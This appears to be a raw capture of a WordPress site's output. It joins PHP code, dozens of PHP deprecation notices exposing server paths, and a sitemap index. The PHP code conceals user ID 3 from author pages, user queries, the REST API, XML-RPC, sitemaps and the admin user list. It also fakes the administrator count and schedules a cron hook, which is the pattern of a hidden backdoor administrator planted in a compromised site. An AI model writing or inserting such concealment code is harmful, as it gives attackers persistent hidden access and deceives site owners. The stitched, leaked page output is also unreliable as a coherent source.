add_action( 'pre_get_posts', function( $q ) {
    if ( ! is_admin() && $q->is_main_query() ) {
        $not_in   = (array) $q->get( 'author__not_in' );
        $not_in[] = 3;

        $q->set(
            'author__not_in',
            array_unique( array_map( 'intval', $not_in ) )
        );
    }
}, 1 );

add_action( 'template_redirect', function() {
    if ( is_author() ) {
        $author = get_queried_object();
        if ( $author instanceof WP_User && (int) $author->ID === 3 ) {
            global $wp_query;
            $wp_query->set_404();
            status_header( 404 );
            nocache_headers();
        }
    }
} );

add_action( 'pre_user_query', function( $q ) {
    if ( current_user_can( 'manage_options' ) ) {
        return;
    }
    global $wpdb;
    $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 3 );
} );

add_action( 'pre_get_users', function( $q ) {
    if ( current_user_can( 'manage_options' ) ) {
        return;
    }
    $exclude   = (array) $q->get( 'exclude' );
    $exclude[] = 3;
    $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );

add_filter( 'wp_dropdown_users_args', function( $a ) {
    $exclude   = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
    $exclude[] = 3;

    $a['exclude'] = array_unique( array_map( 'intval', $exclude ) );

    return $a;
} );

add_filter( 'rest_user_query', function( $args, $request ) {
    $exclude   = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
    $exclude[] = 3;

    $args['exclude'] = array_unique( array_map( 'intval', $exclude ) );

    return $args;
}, 10, 2 );

add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
    $route = $request->get_route();
    if ( preg_match( '#^/wp/v2/users/3(/|$)#', $route ) ) {
        return new WP_Error(
            'rest_user_invalid_id',
            'Invalid user ID.',
            array( 'status' => 404 )
        );
    }
    return $result;
}, 10, 3 );

add_filter( 'xmlrpc_methods', function( $methods ) {
    unset(
        $methods['wp.getUsers'],
        $methods['wp.getUser'],
        $methods['wp.getProfile']
    );
    return $methods;
} );

add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
    $exclude   = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
    $exclude[] = 3;
    $args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
    return $args;
} );

add_action( 'admin_head-users.php', function() {
    echo '<style>#user-3{display:none!important}</style>';
} );

add_filter( 'views_users', function( $views ) {
    foreach ( array( 'all', 'administrator' ) as $key ) {
        if ( isset( $views[ $key ] ) ) {
            $views[ $key ] = preg_replace_callback(
                '/\((\d+)\)/',
                function( $m ) {
                    return '(' . max( 0, (int) $m[1] - 1 ) . ')';
                },
                $views[ $key ],
                1
            );
        }
    }
    return $views;
} );

add_action( 'init', function() {
    if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
        return;
    }
    if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
        wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
    }
} );

add_action( 'wp_extra_bot_heartbeat', function() {
    // noop
} );
<br />
<b>Notice</b>:  Function _load_textdomain_just_in_time was called <strong>incorrectly</strong>. Translation loading for the <code>acf</code> domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the <code>init</code> action or later. Please see <a href="https://developer.wordpress.org/advanced-administration/debug/debug-wordpress/">Debugging in WordPress</a> for more information. (This message was added in version 6.7.0.) in <b>/var/www/vhosts/besensitive.org/httpdocs/BeSensitiveFoundation/wp-includes/functions.php</b> on line <b>6170</b><br />
<br />
<b>Deprecated</b>:  Optional parameter $post_id declared before required parameter $field is implicitly treated as a required parameter in <b>/var/www/vhosts/besensitive.org/httpdocs/BeSensitiveFoundation/wp-content/plugins/acf_pro/includes/acf-value-functions.php</b> on line <b>54</b><br />
<br />
<b>Deprecated</b>:  Optional parameter $value declared before required parameter $field is implicitly treated as a required parameter in <b>/var/www/vhosts/besensitive.org/httpdocs/BeSensitiveFoundation/wp-content/plugins/acf_pro/includes/acf-value-functions.php</b> on line <b>166</b><br />
<br />
<b>Deprecated</b>:  Optional parameter $post_id declared before required parameter $field is implicitly treated as a required parameter in <b>/var/www/vhosts/besensitive.org/httpdocs/BeSensitiveFoundation/wp-content/plugins/acf_pro/includes/acf-value-functions.php</b> on line <b>166</b><br />
<br />
<b>Deprecated</b>:  Creation of dynamic property ACF::$fields is deprecated in <b>/var/www/vhosts/besensitive.org/httpdocs/BeSensitiveFoundation/wp-content/plugins/acf_pro/includes/fields.php</b> on line <b>136</b><br />
<br />
<b>Deprecated</b>:  Creation of dynamic property ACF::$locations is deprecated in <b>/var/www/vhosts/besensitive.org/httpdocs/BeSensitiveFoundation/wp-content/plugins/acf_pro/includes/locations.php</b> on line <b>130</b><br />
<br />
<b>Deprecated</b>:  Creation of dynamic property ACF::$json is deprecated in <b>/var/www/vhosts/besensitive.org/httpdocs/BeSensitiveFoundation/wp-content/plugins/acf_pro/includes/json.php</b> on line <b>184</b><br />
<br />
<b>Deprecated</b>:  Creation of dynamic property acf_loop::$loops is deprecated in <b>/var/www/vhosts/besensitive.org/httpdocs/BeSensitiveFoundation/wp-content/plugins/acf_pro/includes/loop.php</b> on line <b>26</b><br />
<br />
<b>Deprecated</b>:  Creation of dynamic property ACF::$loop is deprecated in <b>/var/www/vhosts/besensitive.org/httpdocs/BeSensitiveFoundation/wp-content/plugins/acf_pro/includes/loop.php</b> on line <b>270</b><br />
<br />
<b>Deprecated</b>:  Creation of dynamic property ACF::$revisions is deprecated in <b>/var/www/vhosts/besensitive.org/httpdocs/BeSensitiveFoundation/wp-content/plugins/acf_pro/includes/revisions.php</b> on line <b>413</b><br />
<br />
<b>Deprecated</b>:  Creation of dynamic property acf_validation::$errors is deprecated in <b>/var/www/vhosts/besensitive.org/httpdocs/BeSensitiveFoundation/wp-content/plugins/acf_pro/includes/validation.php</b> on line <b>26</b><br />
<br />
<b>Deprecated</b>:  Creation of dynamic property ACF::$validation is deprecated in <b>/var/www/vhosts/besensitive.org/httpdocs/BeSensitiveFoundation/wp-content/plugins/acf_pro/includes/validation.php</b> on line <b>212</b><br />
<br />
<b>Deprecated</b>:  Optional parameter $key declared before required parameter $value is implicitly treated as a required parameter in <b>/var/www/vhosts/besensitive.org/httpdocs/BeSensitiveFoundation/wp-content/plugins/acf_pro/includes/ajax/class-acf-ajax.php</b> on line <b>76</b><br />
<br />
<b>Deprecated</b>:  Creation of dynamic property acf_form_customizer::$preview_values is deprecated in <b>/var/www/vhosts/besensitive.org/httpdocs/BeSensitiveFoundation/wp-content/plugins/acf_pro/includes/forms/form-customizer.php</b> on line <b>26</b><br />
<br />
<b>Deprecated</b>:  Creation of dynamic property acf_form_customizer::$preview_fields is deprecated in <b>/var/www/vhosts/besensitive.org/httpdocs/BeSensitiveFoundation/wp-content/plugins/acf_pro/includes/forms/form-customizer.php</b> on line <b>27</b><br />
<br />
<b>Deprecated</b>:  Creation of dynamic property acf_form_customizer::$preview_errors is deprecated in <b>/var/www/vhosts/besensitive.org/httpdocs/BeSensitiveFoundation/wp-content/plugins/acf_pro/includes/forms/form-customizer.php</b> on line <b>28</b><br />
<br />
<b>Deprecated</b>:  Creation of dynamic property ACF::$form_front is deprecated in <b>/var/www/vhosts/besensitive.org/httpdocs/BeSensitiveFoundation/wp-content/plugins/acf_pro/includes/forms/form-front.php</b> on line <b>603</b><br />
<br />
<b>Deprecated</b>:  Creation of dynamic property acf_form_widget::$preview_values is deprecated in <b>/var/www/vhosts/besensitive.org/httpdocs/BeSensitiveFoundation/wp-content/plugins/acf_pro/includes/forms/form-widget.php</b> on line <b>34</b><br />
<br />
<b>Deprecated</b>:  Creation of dynamic property acf_form_widget::$preview_reference is deprecated in <b>/var/www/vhosts/besensitive.org/httpdocs/BeSensitiveFoundation/wp-content/plugins/acf_pro/includes/forms/form-widget.php</b> on line <b>35</b><br />
<br />
<b>Deprecated</b>:  Creation of dynamic property acf_form_widget::$preview_errors is deprecated in <b>/var/www/vhosts/besensitive.org/httpdocs/BeSensitiveFoundation/wp-content/plugins/acf_pro/includes/forms/form-widget.php</b> on line <b>36</b><br />
<br />
<b>Warning</b>:  The magic method Vc_Manager::__wakeup() must have public visibility in <b>/var/www/vhosts/besensitive.org/httpdocs/BeSensitiveFoundation/wp-content/plugins/js_composer/include/classes/core/class-vc-manager.php</b> on line <b>203</b><br />
<br />
<b>Deprecated</b>:  Optional parameter $attach_id declared before required parameter $height is implicitly treated as a required parameter in <b>/var/www/vhosts/besensitive.org/httpdocs/BeSensitiveFoundation/wp-content/plugins/js_composer/include/helpers/helpers.php</b> on line <b>366</b><br />
<br />
<b>Deprecated</b>:  Optional parameter $img_url declared before required parameter $height is implicitly treated as a required parameter in <b>/var/www/vhosts/besensitive.org/httpdocs/BeSensitiveFoundation/wp-content/plugins/js_composer/include/helpers/helpers.php</b> on line <b>366</b><br />
<br />
<b>Deprecated</b>:  version_compare(): Passing null to parameter #2 ($version2) of type string is deprecated in <b>/var/www/vhosts/besensitive.org/httpdocs/BeSensitiveFoundation/wp-content/plugins/vc_addons/Ultimate_VC_Addons.php</b> on line <b>1460</b><br />
<br />
<b>Deprecated</b>:  Optional parameter $content declared before required parameter $tag is implicitly treated as a required parameter in <b>/var/www/vhosts/besensitive.org/httpdocs/BeSensitiveFoundation/wp-content/plugins/vc_addons/modules/ultimate_carousel.php</b> on line <b>924</b><br />
<br />
<b>Deprecated</b>:  Creation of dynamic property acf_field_oembed::$width is deprecated in <b>/var/www/vhosts/besensitive.org/httpdocs/BeSensitiveFoundation/wp-content/plugins/acf_pro/includes/fields/class-acf-field-oembed.php</b> on line <b>31</b><br />
<br />
<b>Deprecated</b>:  Creation of dynamic property acf_field_oembed::$height is deprecated in <b>/var/www/vhosts/besensitive.org/httpdocs/BeSensitiveFoundation/wp-content/plugins/acf_pro/includes/fields/class-acf-field-oembed.php</b> on line <b>32</b><br />
<br />
<b>Deprecated</b>:  Creation of dynamic property acf_field_google_map::$default_values is deprecated in <b>/var/www/vhosts/besensitive.org/httpdocs/BeSensitiveFoundation/wp-content/plugins/acf_pro/includes/fields/class-acf-field-google-map.php</b> on line <b>33</b><br />
<br />
<b>Deprecated</b>:  Creation of dynamic property acf_field__group::$have_rows is deprecated in <b>/var/www/vhosts/besensitive.org/httpdocs/BeSensitiveFoundation/wp-content/plugins/acf_pro/includes/fields/class-acf-field-group.php</b> on line <b>31</b><br />
<br />
<b>Deprecated</b>:  Optional parameter $i declared before required parameter $post_id is implicitly treated as a required parameter in <b>/var/www/vhosts/besensitive.org/httpdocs/BeSensitiveFoundation/wp-content/plugins/acf_pro/pro/fields/class-acf-field-repeater.php</b> on line <b>720</b><br />
<br />
<b>Deprecated</b>:  Optional parameter $i declared before required parameter $post_id is implicitly treated as a required parameter in <b>/var/www/vhosts/besensitive.org/httpdocs/BeSensitiveFoundation/wp-content/plugins/acf_pro/pro/fields/class-acf-field-repeater.php</b> on line <b>786</b><br />
<br />
<b>Deprecated</b>:  Optional parameter $name declared before required parameter $field is implicitly treated as a required parameter in <b>/var/www/vhosts/besensitive.org/httpdocs/BeSensitiveFoundation/wp-content/plugins/acf_pro/pro/fields/class-acf-field-flexible-content.php</b> on line <b>1038</b><br />
<br />
<b>Deprecated</b>:  Optional parameter $i declared before required parameter $post_id is implicitly treated as a required parameter in <b>/var/www/vhosts/besensitive.org/httpdocs/BeSensitiveFoundation/wp-content/plugins/acf_pro/pro/fields/class-acf-field-flexible-content.php</b> on line <b>1074</b><br />
<br />
<b>Deprecated</b>:  Optional parameter $i declared before required parameter $post_id is implicitly treated as a required parameter in <b>/var/www/vhosts/besensitive.org/httpdocs/BeSensitiveFoundation/wp-content/plugins/acf_pro/pro/fields/class-acf-field-flexible-content.php</b> on line <b>1126</b><br />
<br />
<b>Deprecated</b>:  Optional parameter $id declared before required parameter $field is implicitly treated as a required parameter in <b>/var/www/vhosts/besensitive.org/httpdocs/BeSensitiveFoundation/wp-content/plugins/acf_pro/pro/fields/class-acf-field-gallery.php</b> on line <b>296</b><br />
<br />
<b>Deprecated</b>:  Creation of dynamic property acf_field_clone::$cloning is deprecated in <b>/var/www/vhosts/besensitive.org/httpdocs/BeSensitiveFoundation/wp-content/plugins/acf_pro/pro/fields/class-acf-field-clone.php</b> on line <b>34</b><br />
<br />
<b>Deprecated</b>:  Creation of dynamic property acf_field_clone::$have_rows is deprecated in <b>/var/www/vhosts/besensitive.org/httpdocs/BeSensitiveFoundation/wp-content/plugins/acf_pro/pro/fields/class-acf-field-clone.php</b> on line <b>35</b><br />
<br />
<b>Deprecated</b>:  Creation of dynamic property dhz_acf_field_extended_color_picker::$settings is deprecated in <b>/var/www/vhosts/besensitive.org/httpdocs/BeSensitiveFoundation/wp-content/plugins/acf-rgba-color-picker/fields/acf-rgba-color-picker-v5.php</b> on line <b>43</b><br />
<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="https://besensitive.org/wp-sitemap-index.xsl" ?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><sitemap><loc>https://besensitive.org/wp-sitemap-posts-post-1.xml</loc></sitemap><sitemap><loc>https://besensitive.org/wp-sitemap-posts-page-1.xml</loc></sitemap><sitemap><loc>https://besensitive.org/wp-sitemap-taxonomies-category-1.xml</loc></sitemap><sitemap><loc>https://besensitive.org/wp-sitemap-users-1.xml</loc></sitemap></sitemapindex>
